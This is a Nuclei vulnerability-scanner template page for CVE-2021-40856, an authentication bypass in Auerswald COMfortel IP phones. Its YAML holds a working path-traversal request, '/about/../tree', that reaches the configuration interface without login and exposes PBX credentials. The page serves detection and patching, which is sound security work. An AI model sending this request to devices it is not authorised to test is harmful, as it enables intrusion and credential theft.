Skip to content
Nuclei Templates

Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass

ID: CVE-2021-40856

Severity: high

Author: gy741

Tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald

Description

Section titled “Description”

Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix “/about/../” allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.

YAML Source

Section titled “YAML Source”
id: CVE-2021-40856


info:
  name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass
  author: gy741
  severity: high
  description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the device.
  remediation: |
    Apply the latest firmware update provided by Auerswald to fix the authentication bypass vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40856
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass
    - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses
    - http://packetstormsecurity.com/files/165162/Auerswald-COMfortel-1400-2600-3600-IP-2.8F-Authentication-Bypass.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-40856
    cwe-id: CWE-706
    epss-score: 0.19673
    epss-percentile: 0.96195
    cpe: cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: auerswald
    product: comfortel_3600_ip_firmware
  tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald


http:
  - raw:
      - |
        GET /about/../tree?action=get HTTP/1.1
        Host: {{Hostname}}
        Accept: */*


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"TYPE"'
          - '"ITEMS"'
          - '"COUNT"'
        condition: and


      - type: word
        part: header
        words:
          - application/json


      - type: status
        status:
          - 200
# digest: 4a0a00473045022002abb8758532d5415568eb2b8a48ff1834abf15e6a4025c8221618f116c54009022100ca5bd125637a9894007f879510ee38f5848c7fd75a0275b9ab5f6e5401bb79ee:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-40856.yaml"

View on Github